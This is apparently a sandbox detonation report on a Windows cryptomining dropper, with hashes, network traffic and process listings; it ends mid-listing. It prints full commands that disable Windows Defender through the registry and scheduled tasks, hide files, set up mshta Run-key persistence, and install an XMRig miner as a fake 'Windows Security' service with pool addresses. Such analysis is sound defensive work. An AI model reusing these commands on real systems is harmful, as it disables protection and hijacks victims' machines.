2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220901-en
Max time kernel
129s
Max time network
155s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\7za.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")" | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Windows\System32\WScript.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 35 | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 18446744065119617044 | N/A | C:\Perform\Resources\NSudo.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Perform\7za.exe
7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU
C:\Perform\update.exe
C:\Perform\update.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"
C:\Perform\Resources\NSudo.exe
C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\Defender.exe
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\nssm.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")
C:\Windows\system32\attrib.exe
attrib +s +h C:\Perform\7za.exe
C:\Perform\nssm.exe
nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"
C:\Perform\nssm.exe
nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffcf0474f50,0x7ffcf0474f60,0x7ffcf0474f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1420 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1644 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1700 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | palygamesconsutoria.blogspot.com | udp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | tcp |
| US | 8.8.8.8:53 | resources.blogblog.com | udp |
| US | 8.8.8.8:53 | www.blogger.com | udp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | tcp |
| NL | 172.217.168.225:443 | palygamesconsutoria.blogspot.com | udp |
| US | 8.8.8.8:53 | themes.googleusercontent.com | udp |
| NL | 142.251.39.97:443 | themes.googleusercontent.com | tcp |
| NL | 172.217.168.233:443 | www.blogger.com | udp |
| NL | 104.80.225.205:443 | tcp | |
| GB | 51.132.193.104:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp |
Files
memory/4512-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat
| MD5 | 55f5a5033d59e83f200f78efd8cf9ffd |
| SHA1 | b153b8f0da50ffc56996bafa0be0610cec8b9d99 |
| SHA256 | d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041 |
| SHA512 | 9924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047 |
memory/2248-137-0x0000000000000000-mapping.dmp
memory/2204-138-0x0000000000000000-mapping.dmp
memory/3568-139-0x0000000000000000-mapping.dmp
memory/4468-140-0x0000000000000000-mapping.dmp
memory/1476-141-0x0000000000000000-mapping.dmp
memory/1960-142-0x0000000000000000-mapping.dmp
memory/4220-143-0x0000000000000000-mapping.dmp
memory/3716-144-0x0000000000000000-mapping.dmp
memory/3104-145-0x0000000000000000-mapping.dmp
memory/340-146-0x0000000000000000-mapping.dmp
memory/2664-147-0x0000000000000000-mapping.dmp
memory/4812-148-0x0000000000000000-mapping.dmp
memory/3120-149-0x0000000000000000-mapping.dmp
memory/4276-150-0x0000000000000000-mapping.dmp
memory/3484-151-0x0000000000000000-mapping.dmp
memory/4104-152-0x0000000000000000-mapping.dmp
memory/740-153-0x0000000000000000-mapping.dmp
memory/936-154-0x0000000000000000-mapping.dmp
memory/4640-155-0x0000000000000000-mapping.dmp
memory/4336-156-0x0000000000000000-mapping.dmp
memory/4544-157-0x0000000000000000-mapping.dmp
memory/1456-158-0x0000000000000000-mapping.dmp
memory/3380-159-0x0000000000000000-mapping.dmp
memory/4460-160-0x0000000000000000-mapping.dmp
memory/3616-161-0x0000000000000000-mapping.dmp
memory/3260-162-0x0000000000000000-mapping.dmp
memory/4184-163-0x0000000000000000-mapping.dmp
memory/4516-164-0x0000000000000000-mapping.dmp
memory/3620-165-0x0000000000000000-mapping.dmp
memory/3456-166-0x0000000000000000-mapping.dmp
memory/4736-167-0x0000000000000000-mapping.dmp
memory/4524-168-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\files.7z
| MD5 | 6380cb936d9229799750c4416ad99a81 |
| SHA1 | d1efa33ab91b12e336190774e616f5e420979201 |
| SHA256 | f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce |
| SHA512 | 3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970 |
C:\Users\Admin\AppData\Local\Temp\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
C:\Perform\7za.exe
| MD5 | 0184e6ebe133ef41a8cc6ef98a263712 |
| SHA1 | cb9f603e061aef833a2db501aa8ba6ba007d768e |
| SHA256 | dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 |
| SHA512 | 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed |
memory/4920-171-0x0000000000000000-mapping.dmp
memory/3324-173-0x0000000000000000-mapping.dmp
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
C:\Perform\update.exe
| MD5 | 0e4afc55e03f8fe26d82e054004c16a3 |
| SHA1 | e5560a6d10d11e84eb094561ae1ec1c4461dd2c7 |
| SHA256 | d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e |
| SHA512 | 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f |
C:\Perform\up.vbs
| MD5 | 9fc9cd6fff29c03e2b164cafe21543a1 |
| SHA1 | c348cd40f9e112413a2587ef3036628a056aee13 |
| SHA256 | b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1 |
| SHA512 | 1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b |
memory/3020-177-0x0000000000000000-mapping.dmp
memory/5104-178-0x0000000000000000-mapping.dmp
memory/4484-179-0x0000000000000000-mapping.dmp
C:\Perform\Resources\NSudo.exe
| MD5 | 5cae01aea8ed390ce9bec17b6c1237e4 |
| SHA1 | 3a80a49efaac5d839400e4fb8f803243fb39a513 |
| SHA256 | 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 |
| SHA512 | c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481 |
memory/3292-181-0x0000000000000000-mapping.dmp
C:\Perform\Defender.exe
| MD5 | 33dcb753b2236649ae2f13d898e8eb5d |
| SHA1 | f9be1a9b50b55d9244e20c8ea79ad276854f461c |
| SHA256 | f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160 |
| SHA512 | 7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731 |
memory/2116-183-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
memory/4804-185-0x0000000000000000-mapping.dmp
memory/3064-186-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
memory/4584-187-0x0000000000000000-mapping.dmp
memory/4428-189-0x0000000000000000-mapping.dmp
C:\Perform\nssm.exe
| MD5 | bd3b9dac9198c57238d236435bf391ca |
| SHA1 | e0b966cfbe9e804319cfd3b756b12ad8a2294b24 |
| SHA256 | 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d |
| SHA512 | 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0 |
\??\pipe\crashpad_3344_EMRHQGXFHJGRFGJT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral3
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
149s
Max time network
116s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1112 set thread context of 908 | N/A | C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe | C:\Windows\System32\svchost.exe |
| PID 868 set thread context of 840 | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | C:\Windows\System32\svchost.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"
C:\Windows\system32\schtasks.exe
